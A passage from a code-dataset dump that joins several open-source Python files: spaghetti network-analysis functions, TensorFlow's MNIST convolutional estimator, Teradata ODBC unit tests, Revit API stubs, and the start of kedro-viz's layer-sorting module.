>>> ntw = spaghetti.Network(in_data=lines)
Extract the minimum spanning tree.
>>> minst_net = spaghetti.spanning_tree(ntw)
>>> min_len = sum(minst_net.arc_lengths.values())
>>> min_len
7.0
Extract the maximum spanning tree.
>>> maxst_net = spaghetti.spanning_tree(ntw, maximum=True)
>>> max_len = sum(maxst_net.arc_lengths.values())
>>> max_len
9.0
>>> max_len > min_len
True
"""
# (un)silence warning
weights_kws = {"silence_warnings": silence_warnings}
# do not extract graph object while testing for cycles
net_kws = {"extractgraph": False, "weights_kws": weights_kws}
# if the network has no cycles, it is already a spanning tree
if util.network_has_cycle(net.adjacencylist):
if method.lower() == "sort":
spanning_tree = mst_weighted_sort(net, maximum, net_kws)
else:
msg = "'%s' not a valid method for minimum spanning tree creation"
raise ValueError(msg % method)
# instantiate the spanning tree as a network object
net = Network(in_data=spanning_tree, weights_kws=weights_kws)
return net
def mst_weighted_sort(net, maximum, net_kws):
"""Extract a minimum or maximum spanning tree from a network used
the length-weighted sort method.
Parameters
----------
net : spaghetti.Network
See ``spanning_tree()``.
maximum : bool
See ``spanning_tree()``.
net_kws : dict
Keywords arguments for instaniating a ``spaghetti.Network``.
Returns
-------
spanning_tree : list
All networks arcs that are members of the spanning tree.
Notes
-----
This function is based on the method found in Chapter 3
Section 4.3 of :cite:`Okabe2012`.
"""
# network arcs dictionary sorted by arc length
sort_kws = {"key": net.arc_lengths.get, "reverse": maximum}
sorted_lengths = sorted(net.arc_lengths, **sort_kws)
# the spanning tree is initially empty
spanning_tree = []
# iterate over each lengths of network arc
while sorted_lengths:
_arc = sorted_lengths.pop(0)
# make a spatial representation of an arc
chain_rep = util.chain_constr(net.vertex_coords, [_arc])
# current set of network arcs as libpysal.cg.Chain
_chains = spanning_tree + chain_rep
# current network iteration
_ntw = Network(in_data=_chains, **net_kws)
# determine if the network contains a cycle
if not util.network_has_cycle(_ntw.adjacencylist):
# If no cycle is present, add the arc to the spanning tree
spanning_tree.extend(chain_rep)
return spanning_tree
@requires("geopandas", "shapely")
def element_as_gdf(
net,
vertices=False,
arcs=False,
pp_name=None,
snapped=False,
routes=None,
id_col="id",
geom_col="geometry",
):
"""Return a ``geopandas.GeoDataFrame`` of network elements. This can be
(a) the vertices of a network; (b) the arcs of a network; (c) both the
vertices and arcs of the network; (d) the raw point pattern associated
with the network; (e) the snapped point pattern of (d); or (f) the
shortest path routes between point observations.
Parameters
----------
net : spaghetti.Network
A `spaghetti` network object.
vertices : bool
Extract the network vertices (``True``). Default is ``False``.
arcs : bool
Extract the network arcs (``True``). Default is ``False``.
pp_name : str
Name of the ``network.PointPattern`` to extract.
Default is ``None``.
snapped : bool
If extracting a ``network.PointPattern``, set to ``True`` for
snapped point locations along the network. Default is ``False``.
routes : dict
See ``paths`` from ``spaghetti.Network.shortest_paths``.
Default is ``None``.
id_col : str
``geopandas.GeoDataFrame`` column name for IDs. Default is ``"id"``.
When extracting routes this creates an (origin, destination) tuple.
geom_col : str
``geopandas.GeoDataFrame`` column name for geometry. Default is
``"geometry"``.
Raises
------
KeyError
In order to extract a ``network.PointPattern`` it must already
be a part of the network object. This exception is raised
when a ``network.PointPattern`` is being extracted that does
not exist within the network object.
Returns
-------
points : geopandas.GeoDataFrame
Network point elements (either vertices or ``network.PointPattern``
points) as a ``geopandas.GeoDataFrame`` of ``shapely.geometry.Point``
objects with an ``"id"`` column and ``"geometry""`` column.
If the network object has a ``network_component_vertices`` attribute,
then component labels are also added in a column.
lines : geopandas.GeoDataFrame
Network arc elements as a ``geopandas.GeoDataFrame`` of
``shapely.geometry.LineString`` objects with an ``"id"``
column and ``"geometry"`` column. If the network object has
a ``network_component_labels`` attribute, then component labels
are also added in a column.
paths : geopandas.GeoDataFrame
Shortest path routes along network arc elements as a
``geopandas.GeoDataFrame`` of ``shapely.geometry.LineString``
objects with an ``"id"`` (see ``spaghetti.Network.shortest_paths()``)
column and ``"geometry"`` column.
Notes
-----
When both network vertices and arcs are desired, the variable
declaration must be in the order: <vertices>, <arcs>.
This function requires ``geopandas``.
See also
--------
geopandas.GeoDataFrame
Examples
--------
Instantiate a network object.
>>> import spaghetti
>>> from libpysal import examples
>>> ntw = spaghetti.Network(examples.get_path("streets.shp"))
Extract the network elements (vertices and arcs) as
``geopandas.GeoDataFrame`` objects.
>>> vertices_df, arcs_df = spaghetti.element_as_gdf(
... ntw, vertices=True, arcs=True
... )
Examine the first vertex. It is a member of the component labeled ``0``.
>>> vertices_df.loc[0]
id 0
geometry POINT (728368.04762 877125.89535)
comp_label 0
Name: 0, dtype: object
Calculate the total length of the network.
>>> arcs_df.geometry.length.sum()
104414.09200823458
"""
# shortest path routes between observations
if routes:
paths = util._routes_as_gdf(routes, id_col, geom_col)
return paths
# need vertices place holder to create network segment LineStrings
# even if only network edges are desired.
vertices_for_arcs = False
if arcs and not vertices:
vertices_for_arcs = True
# vertices/nodes/points
if vertices or vertices_for_arcs or pp_name:
points = util._points_as_gdf(
net,
vertices,
vertices_for_arcs,
pp_name,
snapped,
id_col=id_col,
geom_col=geom_col,
)
# return points geodataframe if arcs not specified or
# if extracting `PointPattern` points
if not arcs or pp_name:
return points
# arcs
arcs = util._arcs_as_gdf(net, points, id_col=id_col, geom_col=geom_col)
if vertices_for_arcs:
return arcs
else:
return points, arcs
def regular_lattice(bounds, nh, nv=None, exterior=False):
"""Generate a regular lattice of line segments
(`libpysal.cg.Chain objects <https://pysal.org/libpysal/generated/libpysal.cg.Chain.html#libpysal.cg.Chain>`_).
Parameters
----------
bounds : {tuple, list}
Area bounds in the form - <minx,miny,maxx,maxy>.
nh : int
The number of internal horizontal lines of the lattice.
nv : int
The number of internal vertical lines of the lattice. Defaults to
``nh`` if left as None.
exterior : bool
Flag for including the outer bounding box segments. Default is False.
Returns
-------
lattice : list
The ``libpysal.cg.Chain`` objects forming a regular lattice.
Notes
-----
The ``nh`` and ``nv`` parameters do not include the external
line segments. For example, setting ``nh=3, nv=2, exterior=True``
will result in 5 horizontal line sets and 4 vertical line sets.
Examples
--------
Create a 5x5 regular lattice with an exterior
>>> import spaghetti
>>> lattice = spaghetti.regular_lattice((0,0,4,4), 3, exterior=True)
>>> lattice[0].vertices
[(0.0, 0.0), (1.0, 0.0)]
Create a 5x5 regular lattice without an exterior
>>> lattice = spaghetti.regular_lattice((0,0,5,5), 3, exterior=False)
>>> lattice[-1].vertices
[(3.75, 3.75), (3.75, 5.0)]
Create a 7x9 regular lattice with an exterior from the
bounds of ``streets.shp``.
>>> path = libpysal.examples.get_path("streets.shp")
>>> shp = libpysal.io.open(path)
>>> lattice = spaghetti.regular_lattice(shp.bbox, 5, nv=7, exterior=True)
>>> lattice[0].vertices
[(723414.3683108028, 875929.0396895551), (724286.1381211297, 875929.0396895551)]
"""
# check for bounds validity
if len(bounds) != 4:
bounds_len = len(bounds)
msg = "The 'bounds' parameter is %s elements " % bounds_len
msg += "but should be exactly 4 - <minx,miny,maxx,maxy>."
raise RuntimeError(msg)
# check for bounds validity
if not nv:
nv = nh
try:
nh, nv = int(nh), int(nv)
except TypeError:
nlines_types = type(nh), type(nv)
msg = "The 'nh' and 'nv' parameters (%s, %s) " % nlines_types
msg += "could not be converted to integers."
raise TypeError(msg)
# bounding box line lengths
len_h, len_v = bounds[2] - bounds[0], bounds[3] - bounds[1]
# horizontal and vertical increments
incr_h, incr_v = len_h / float(nh + 1), len_v / float(nv + 1)
# define the horizontal and vertical space
space_h = [incr_h * slot for slot in range(nv + 2)]
space_v = [incr_v * slot for slot in range(nh + 2)]
# create vertical and horizontal lines
lines_h = util.build_chains(space_h, space_v, exterior, bounds)
lines_v = util.build_chains(space_h, space_v, exterior, bounds, h=False)
# combine into one list
lattice = lines_h + lines_v
return lattice
class PointPattern:
"""A stub point pattern class used to store a point pattern.
Note from the original author of ``pysal.network``:
This class is monkey patched with network specific attributes when the
points are snapped to a network. In the future this class may be
replaced with a generic point pattern class.
Parameters
----------
in_data : {str, list, tuple, libpysal.cg.Point, geopandas.GeoDataFrame}
The input geographic data. Either (1) a path to a shapefile
(str); (2) an iterable containing ``libpysal.cg.Point``
objects; (3) a single ``libpysal.cg.Point``; or
(4) a ``geopandas.GeoDataFrame``.
idvariable : str
Field in the shapefile to use as an ID variable.
attribute : bool
A flag to indicate whether all attributes are tagged to this
class (``True``) or excluded (``False``). Default is ``False``.
Attributes
----------
points : dict
Keys are the point IDs (int). Values are the :math:`(x,y)`
coordinates (tuple).
npoints : int
The number of points.
obs_to_arc : dict
Keys are arc IDs (tuple). Values are snapped point information
(``dict``). Within the snapped point information (``dict``)
keys are observation IDs (``int``), and values are snapped
coordinates.
obs_to_vertex : list
List of incident network vertices to snapped observation points
converted from a ``default_dict``. Originally in the form of
paired left/right nearest network vertices {netvtx1: obs_id1,
netvtx2: obs_id1, netvtx1: obs_id2... netvtx1: obs_idn}, then
simplified to a list in the form
[netvtx1, netvtx2, netvtx1, netvtx2, ...].
dist_to_vertex : dict
Keys are observations IDs (``int``). Values are distance lookup
(``dict``). Within distance lookup (``dict``) keys are the two
incident vertices of the arc and values are distance to each of
those arcs.
snapped_coordinates : dict
Keys are the point IDs (int). Values are the snapped :math:`(x,y)`
coordinates (tuple).
snap_dist : bool
Flag as ``True`` to include the distance from the original
location to the snapped location along the network. Default
is ``False``.
"""
def __init__(self, in_data=None, idvariable=None, attribute=False):
# initialize points dictionary and counter
self.points = {}
self.npoints = 0
# determine input point data type
in_dtype = str(type(in_data)).split("'")[1]
# flag for points from a shapefile
from_shp = False
# flag for points as libpysal.cg.Point objects
is_libpysal_points = False
supported_iterables = ["list", "tuple"]
# type error message
msg = "'%s' not supported for point pattern instantiation."
# set appropriate geometries
if in_dtype == "str":
from_shp = True
elif in_dtype in supported_iterables:
dtype = str(type(in_data[0])).split("'")[1]
if dtype == "libpysal.cg.shapes.Point":
is_libpysal_points = True
else:
raise TypeError(msg % dtype)
elif in_dtype == "libpysal.cg.shapes.Point":
in_data = [in_data]
is_libpysal_points = True
elif in_dtype == "geopandas.geodataframe.GeoDataFrame":
from_shp = False
else:
raise TypeError(msg % in_dtype)
# either set native point ID from dataset or create new IDs
if idvariable and not is_libpysal_points:
ids = weights.util.get_ids(in_data, idvariable)
else:
ids = None
# extract the point geometries
if not is_libpysal_points:
if from_shp:
pts = open(in_data)
else:
pts_objs = list(in_data.geometry)
pts = [cg.shapes.Point((p.x, p.y)) for p in pts_objs]
else:
pts = in_data
# fetch attributes if requested
if attribute and not is_libpysal_points:
# open the database file if data is from shapefile
if from_shp:
dbname = os.path.splitext(in_data)[0] + ".dbf"
db = open(dbname)
# if data is from a GeoDataFrame, drop the geometry column
# and declare attribute values as a list of lists
else:
db = in_data.drop(in_data.geometry.name, axis=1).values.tolist()
db = [[d] for d in db]
else:
db = None
# iterate over all points
for i, pt in enumerate(pts):
# IDs, attributes
if ids and db is not None:
self.points[ids[i]] = {"coordinates": pt, "properties": db[i]}
# IDs, no attributes
elif ids and db is None:
self.points[ids[i]] = {"coordinates": pt, "properties": None}
# no IDs, attributes
elif not ids and db is not None:
self.points[i] = {"coordinates": pt, "properties": db[i]}
# no IDs, no attributes
else:
self.points[i] = {"coordinates": pt, "properties": None}
# close the shapefile and database file
# if the input data is a .shp
if from_shp:
pts.close()
if db:
db.close()
# record number of points
self.npoints = len(self.points.keys())
class SimulatedPointPattern:
"""Note from the original author of ``pysal.network``:
Struct style class to mirror the ``PointPattern`` class.
If the ``PointPattern`` class has methods, it might make
sense to make this a child of that class. This class is not intended
to be used by the external user.
Attributes
----------
npoints : int
The number of points.
obs_to_arc : dict
Keys are arc IDs (tuple). Values are snapped point information
(dict). Within the snapped point information (dict)
keys are observation IDs (int), and values are snapped
coordinates.
obs_to_vertex : list
List of incident network vertices to snapped observation points
converted from a default_dict. Originally in the form of
paired left/right nearest network vertices {netvtx1: obs_id1,
netvtx2: obs_id1, netvtx1: obs_id2... netvtx1: obs_idn}, then
simplified to a list in the form
[netvtx1, netvtx2, netvtx1, netvtx2, ...].
dist_to_vertex : dict
Keys are observations IDs (int). Values are distance lookup
(dict). Within distance lookup (dict) keys are the two
incident vertices of the arc and values are distance to each of
those arcs.
snapped_coordinates : dict
Keys are the point IDs (int). Values are the snapped :math:`(x,y)`
coordinates (tuple).
snap_dist : bool
Flag as ``True`` to include the distance from the original
location to the snapped location along the network. Default
is ``False``.
"""
def __init__(self):
# duplicate post-snapping PointPattern class structure
self.npoints = 0
self.obs_to_arc = {}
self.obs_to_vertex = defaultdict(list)
self.dist_to_vertex = {}
self.snapped_coordinates = {}
|
official/mnist/mnist.py | TuKJet/models | 3,326 | 16319 | <filename>official/mnist/mnist.py<gh_stars>1000+
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Convolutional Neural Network Estimator for MNIST, built with tf.layers."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import os
import sys
import tensorflow as tf
import dataset
class Model(object):
"""Class that defines a graph to recognize digits in the MNIST dataset."""
def __init__(self, data_format):
"""Creates a model for classifying a hand-written digit.
Args:
data_format: Either 'channels_first' or 'channels_last'.
'channels_first' is typically faster on GPUs while 'channels_last' is
typically faster on CPUs. See
https://www.tensorflow.org/performance/performance_guide#data_formats
"""
if data_format == 'channels_first':
self._input_shape = [-1, 1, 28, 28]
else:
assert data_format == 'channels_last'
self._input_shape = [-1, 28, 28, 1]
self.conv1 = tf.layers.Conv2D(
32, 5, padding='same', data_format=data_format, activation=tf.nn.relu)
self.conv2 = tf.layers.Conv2D(
64, 5, padding='same', data_format=data_format, activation=tf.nn.relu)
self.fc1 = tf.layers.Dense(1024, activation=tf.nn.relu)
self.fc2 = tf.layers.Dense(10)
self.dropout = tf.layers.Dropout(0.4)
self.max_pool2d = tf.layers.MaxPooling2D(
(2, 2), (2, 2), padding='same', data_format=data_format)
def __call__(self, inputs, training):
"""Add operations to classify a batch of input images.
Args:
inputs: A Tensor representing a batch of input images.
training: A boolean. Set to True to add operations required only when
training the classifier.
Returns:
A logits Tensor with shape [<batch_size>, 10].
"""
y = tf.reshape(inputs, self._input_shape)
y = self.conv1(y)
y = self.max_pool2d(y)
y = self.conv2(y)
y = self.max_pool2d(y)
y = tf.layers.flatten(y)
y = self.fc1(y)
y = self.dropout(y, training=training)
return self.fc2(y)
def model_fn(features, labels, mode, params):
"""The model_fn argument for creating an Estimator."""
model = Model(params['data_format'])
image = features
if isinstance(image, dict):
image = features['image']
if mode == tf.estimator.ModeKeys.PREDICT:
logits = model(image, training=False)
predictions = {
'classes': tf.argmax(logits, axis=1),
'probabilities': tf.nn.softmax(logits),
}
return tf.estimator.EstimatorSpec(
mode=tf.estimator.ModeKeys.PREDICT,
predictions=predictions,
export_outputs={
'classify': tf.estimator.export.PredictOutput(predictions)
})
if mode == tf.estimator.ModeKeys.TRAIN:
optimizer = tf.train.AdamOptimizer(learning_rate=1e-4)
logits = model(image, training=True)
loss = tf.losses.softmax_cross_entropy(onehot_labels=labels, logits=logits)
accuracy = tf.metrics.accuracy(
labels=tf.argmax(labels, axis=1), predictions=tf.argmax(logits, axis=1))
# Name the accuracy tensor 'train_accuracy' to demonstrate the
# LoggingTensorHook.
tf.identity(accuracy[1], name='train_accuracy')
tf.summary.scalar('train_accuracy', accuracy[1])
return tf.estimator.EstimatorSpec(
mode=tf.estimator.ModeKeys.TRAIN,
loss=loss,
train_op=optimizer.minimize(loss, tf.train.get_or_create_global_step()))
if mode == tf.estimator.ModeKeys.EVAL:
logits = model(image, training=False)
loss = tf.losses.softmax_cross_entropy(onehot_labels=labels, logits=logits)
return tf.estimator.EstimatorSpec(
mode=tf.estimator.ModeKeys.EVAL,
loss=loss,
eval_metric_ops={
'accuracy':
tf.metrics.accuracy(
labels=tf.argmax(labels, axis=1),
predictions=tf.argmax(logits, axis=1)),
})
def main(unused_argv):
data_format = FLAGS.data_format
if data_format is None:
data_format = ('channels_first'
if tf.test.is_built_with_cuda() else 'channels_last')
mnist_classifier = tf.estimator.Estimator(
model_fn=model_fn,
model_dir=FLAGS.model_dir,
params={
'data_format': data_format
})
# Train the model
def train_input_fn():
# When choosing shuffle buffer sizes, larger sizes result in better
# randomness, while smaller sizes use less memory. MNIST is a small
# enough dataset that we can easily shuffle the full epoch.
ds = dataset.train(FLAGS.data_dir)
ds = ds.cache().shuffle(buffer_size=50000).batch(FLAGS.batch_size).repeat(
FLAGS.train_epochs)
(images, labels) = ds.make_one_shot_iterator().get_next()
return (images, labels)
# Set up training hook that logs the training accuracy every 100 steps.
tensors_to_log = {'train_accuracy': 'train_accuracy'}
logging_hook = tf.train.LoggingTensorHook(
tensors=tensors_to_log, every_n_iter=100)
mnist_classifier.train(input_fn=train_input_fn, hooks=[logging_hook])
# Evaluate the model and print results
def eval_input_fn():
return dataset.test(FLAGS.data_dir).batch(
FLAGS.batch_size).make_one_shot_iterator().get_next()
eval_results = mnist_classifier.evaluate(input_fn=eval_input_fn)
print()
print('Evaluation results:\n\t%s' % eval_results)
# Export the model
if FLAGS.export_dir is not None:
image = tf.placeholder(tf.float32, [None, 28, 28])
input_fn = tf.estimator.export.build_raw_serving_input_receiver_fn({
'image': image,
})
mnist_classifier.export_savedmodel(FLAGS.export_dir, input_fn)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument(
'--batch_size',
type=int,
default=100,
help='Number of images to process in a batch')
parser.add_argument(
'--data_dir',
type=str,
default='/tmp/mnist_data',
help='Path to directory containing the MNIST dataset')
parser.add_argument(
'--model_dir',
type=str,
default='/tmp/mnist_model',
help='The directory where the model will be stored.')
parser.add_argument(
'--train_epochs', type=int, default=40, help='Number of epochs to train.')
parser.add_argument(
'--data_format',
type=str,
default=None,
choices=['channels_first', 'channels_last'],
help='A flag to override the data format used in the model. channels_first '
'provides a performance boost on GPU but is not always compatible '
'with CPU. If left unspecified, the data format will be chosen '
'automatically based on whether TensorFlow was built for CPU or GPU.')
parser.add_argument(
'--export_dir',
type=str,
help='The directory where the exported SavedModel will be stored.')
tf.logging.set_verbosity(tf.logging.INFO)
FLAGS, unparsed = parser.parse_known_args()
tf.app.run(main=main, argv=[sys.argv[0]] + unparsed)
|
test/test_tdodbc.py | Teradata/PyTd | 133 | 16354 | # The MIT License (MIT)
#
# Copyright (c) 2015 by Teradata
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import unittest
import os
import teradata
from teradata import tdodbc, util
class TdOdbcTest (unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.username = cls.password = util.setupTestUser(udaExec, dsn)
def testGlobals(self):
self.assertEqual(tdodbc.apilevel, "2.0")
self.assertEqual(tdodbc.threadsafety, 1)
self.assertEqual(tdodbc.paramstyle, "qmark")
def testSystemNotFound(self):
with self.assertRaises(tdodbc.DatabaseError) as cm:
tdodbc.connect(system="continuum.td.teradata.com",
username=self.username, password=self.password)
self.assertTrue("08004" in cm.exception.msg, cm.exception)
def testBadCredentials(self):
with self.assertRaises(tdodbc.DatabaseError) as cm:
tdodbc.connect(system=system, username="bad", password="<PASSWORD>")
self.assertEqual(cm.exception.code, 8017, cm.exception.msg)
def testConnect(self):
conn = tdodbc.connect(
system=system, username=self.username, password=self.password)
self.assertIsNotNone(conn)
conn.close()
def testConnectBadDriver(self):
with self.assertRaises(tdodbc.InterfaceError) as cm:
tdodbc.connect(
system=system, username=self.username,
password=self.password,
driver="BadDriver")
self.assertEqual(cm.exception.code, "DRIVER_NOT_FOUND")
def testCursorBasics(self):
with tdodbc.connect(system=system, username=self.username,
password=self.password, autoCommit=True) as conn:
self.assertIsNotNone(conn)
with conn.cursor() as cursor:
count = 0
for row in cursor.execute("SELECT * FROM DBC.DBCInfo"):
self.assertEqual(len(row), 2)
self.assertIsNotNone(row[0])
self.assertIsNotNone(row['InfoKey'])
self.assertIsNotNone(row['infokey'])
self.assertIsNotNone(row.InfoKey)
self.assertIsNotNone(row.infokey)
self.assertIsNotNone(row[1])
self.assertIsNotNone(row['InfoData'])
self.assertIsNotNone(row['infodata'])
self.assertIsNotNone(row.infodata)
self.assertIsNotNone(row.InfoData)
row[0] = "test1"
self.assertEqual(row[0], "test1")
self.assertEqual(row['InfoKey'], "test1")
self.assertEqual(row.infokey, "test1")
row['infokey'] = "test2"
self.assertEqual(row[0], "test2")
self.assertEqual(row['InfoKey'], "test2")
self.assertEqual(row.infokey, "test2")
row.infokey = "test3"
self.assertEqual(row[0], "test3")
self.assertEqual(row['InfoKey'], "test3")
self.assertEqual(row.InfoKey, "test3")
count += 1
self.assertEqual(cursor.description[0][0], "InfoKey")
self.assertEqual(cursor.description[0][1], tdodbc.STRING)
self.assertEqual(cursor.description[1][0], "InfoData")
self.assertEqual(cursor.description[1][1], tdodbc.STRING)
self.assertEqual(count, 3)
def testExecuteWithParamsMismatch(self):
with self.assertRaises(teradata.InterfaceError) as cm:
with tdodbc.connect(system=system, username=self.username,
password=<PASSWORD>,
autoCommit=True) as conn:
self.assertIsNotNone(conn)
with conn.cursor() as cursor:
cursor.execute(
"CREATE TABLE testExecuteWithParamsMismatch (id INT, "
"name VARCHAR(128), dob TIMESTAMP)")
cursor.execute(
"INSERT INTO testExecuteWithParamsMismatch "
"VALUES (?, ?, ?)", (1, "TEST", ))
self.assertEqual(
cm.exception.code, "PARAMS_MISMATCH", cm.exception.msg)
configFiles = [os.path.join(os.path.dirname(__file__), 'udaexec.ini')]
udaExec = teradata.UdaExec(configFiles=configFiles, configureLogging=False)
dsn = 'ODBC'
odbcConfig = udaExec.config.section(dsn)
system = odbcConfig['system']
super_username = odbcConfig['username']
super_password = odbcConfig['password']
if __name__ == '__main__':
unittest.main()
|
release/stubs.min/Autodesk/Revit/UI/Plumbing.py | htlcnn/ironpython-stubs | 182 | 16357 | <reponame>htlcnn/ironpython-stubs
# encoding: utf-8
# module Autodesk.Revit.UI.Plumbing calls itself Plumbing
# from RevitAPIUI,Version=172.16.58.3,Culture=neutral,PublicKeyToken=null
# by generator 1.145
# no doc
# no imports
# no functions
# classes
class IPipeFittingAndAccessoryPressureDropUIServer(IExternalServer):
""" Interface for external servers providing optional UI for pipe fitting and pipe accessory coefficient calculation. """
def GetDBServerId(self):
"""
GetDBServerId(self: IPipeFittingAndAccessoryPressureDropUIServer) -> Guid
Returns the Id of the corresponding DB server for which this server provides an
optional UI.
Returns: The Id of the DB server.
"""
pass
def ShowSettings(self,data):
"""
ShowSettings(self: IPipeFittingAndAccessoryPressureDropUIServer,data: PipeFittingAndAccessoryPressureDropUIData) -> bool
Shows the settings UI.
data: The input data of the calculation.
Returns: True if the user makes any changes in the UI,false otherwise.
"""
pass
def __init__(self,*args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
class PipeFittingAndAccessoryPressureDropUIData(object,IDisposable):
""" The input and output data used by external UI servers for storing UI settings. """
def Dispose(self):
""" Dispose(self: PipeFittingAndAccessoryPressureDropUIData) """
pass
def GetUIDataItems(self):
"""
GetUIDataItems(self: PipeFittingAndAccessoryPressureDropUIData) -> IList[PipeFittingAndAccessoryPressureDropUIDataItem]
Gets all UI data items stored in the UI data.
Returns: An array of UI data items.
"""
pass
def GetUnits(self):
"""
GetUnits(self: PipeFittingAndAccessoryPressureDropUIData) -> Units
Gets units.
Returns: The Units object.
"""
pass
def ReleaseUnmanagedResources(self,*args):
""" ReleaseUnmanagedResources(self: PipeFittingAndAccessoryPressureDropUIData,disposing: bool) """
pass
def __enter__(self,*args):
""" __enter__(self: IDisposable) -> object """
pass
def __exit__(self,*args):
""" __exit__(self: IDisposable,exc_type: object,exc_value: object,exc_back: object) """
pass
def __init__(self,*args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
def __repr__(self,*args):
""" __repr__(self: object) -> str """
pass
IsValidObject=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Specifies whether the .NET object represents a valid Revit entity.
Get: IsValidObject(self: PipeFittingAndAccessoryPressureDropUIData) -> bool
"""
class PipeFittingAndAccessoryPressureDropUIDataItem(object,IDisposable):
""" The input and output data used by external UI servers for initializing and storing the UI settings. """
def Dispose(self):
""" Dispose(self: PipeFittingAndAccessoryPressureDropUIDataItem) """
pass
def GetEntity(self):
"""
GetEntity(self: PipeFittingAndAccessoryPressureDropUIDataItem) -> Entity
Returns the entity set by UI server.
or an invalid entity otherwise.
Returns: The returned Entity.
"""
pass
def GetPipeFittingAndAccessoryData(self):
"""
GetPipeFittingAndAccessoryData(self: PipeFittingAndAccessoryPressureDropUIDataItem) -> PipeFittingAndAccessoryData
Gets the fitting data stored in the UI data item.
Returns: The fitting data stored in the UI data item.
"""
pass
def ReleaseUnmanagedResources(self,*args):
""" ReleaseUnmanagedResources(self: PipeFittingAndAccessoryPressureDropUIDataItem,disposing: bool) """
pass
def SetEntity(self,entity):
"""
SetEntity(self: PipeFittingAndAccessoryPressureDropUIDataItem,entity: Entity)
Stores the entity in the UI data item.
entity: The Entity to be stored.
"""
pass
def __enter__(self,*args):
""" __enter__(self: IDisposable) -> object """
pass
def __exit__(self,*args):
""" __exit__(self: IDisposable,exc_type: object,exc_value: object,exc_back: object) """
pass
def __init__(self,*args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
def __repr__(self,*args):
""" __repr__(self: object) -> str """
pass
IsValidObject=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Specifies whether the .NET object represents a valid Revit entity.
Get: IsValidObject(self: PipeFittingAndAccessoryPressureDropUIDataItem) -> bool
"""
|
package/kedro_viz/services/layers.py | pascalwhoop/kedro-viz | 246 | 16368 | <reponame>pascalwhoop/kedro-viz
# Copyright 2021 QuantumBlack Visual Analytics Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
# OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, AND
# NONINFRINGEMENT. IN NO EVENT WILL THE LICENSOR OR OTHER CONTRIBUTORS
# BE LIABLE FOR ANY CLAIM, DAMAGES, OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF, OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
# The QuantumBlack Visual Analytics Limited ("QuantumBlack") name and logo
# (either separately or in combination, "QuantumBlack Trademarks") are
# trademarks of QuantumBlack. The License does not grant you any right or
# license to the QuantumBlack Trademarks. You may not use the QuantumBlack
# Trademarks or any confusingly similar mark as a trademark for your product,
# or use the QuantumBlack Trademarks in any other manner that might cause
# confusion in the marketplace, including but not limited to in advertising,
# on websites, or on software.
#
# See the License for the specific language governing permissions and
# limitations under the License.
"""`kedro_viz.services.layers` defines layers-related logic."""
import logging
from collections import defaultdict
from typing import Dict, List, Set
from toposort import CircularDependencyError, toposort_flatten
from kedro_viz.models.graph import GraphNode
logger = logging.getLogger(__name__)
def sort_layers(
nodes: Dict[str, GraphNode], dependencies: Dict[str, Set[str]]
) -> List[str]:
"""Given a DAG represented by a dictionary of nodes, some of which have a `layer` attribute,
along with their dependencies, return the list of all layers sorted according to
the nodes' topological order, i.e. a layer should appear before another layer in the list
if its node is a dependency of the other layer's node, directly or indirectly.
For example, given the following graph:
node1(layer=a) -> node2 -> node4 -> node6(layer=d)
| ^
v |
node3(layer=b) -> node5(layer=c)
The layers ordering should be: [a, b, c, d]
In theory, this is a problem of finding the
[transitive closure](https://en.wikipedia.org/wiki/Transitive_closure) in a graph of layers
and then toposort them. The algorithm below follows a repeated depth-first search approach:
* For every node, find all layers that depends on it in a depth-first search.
* While traversing, build up a dictionary of {node_id -> layers} for the node
that have already been visited.
* Turn the final {node_id -> layers} into a {layer -> layers} to represent the layers'
dependencies. Note: the key is a layer and the values are the parents of that layer,
just because that's the format toposort requires.
* Feed this layers dictionary to ``toposort`` and return the sorted values.
* Raise CircularDependencyError if the layers cannot be sorted topologically,
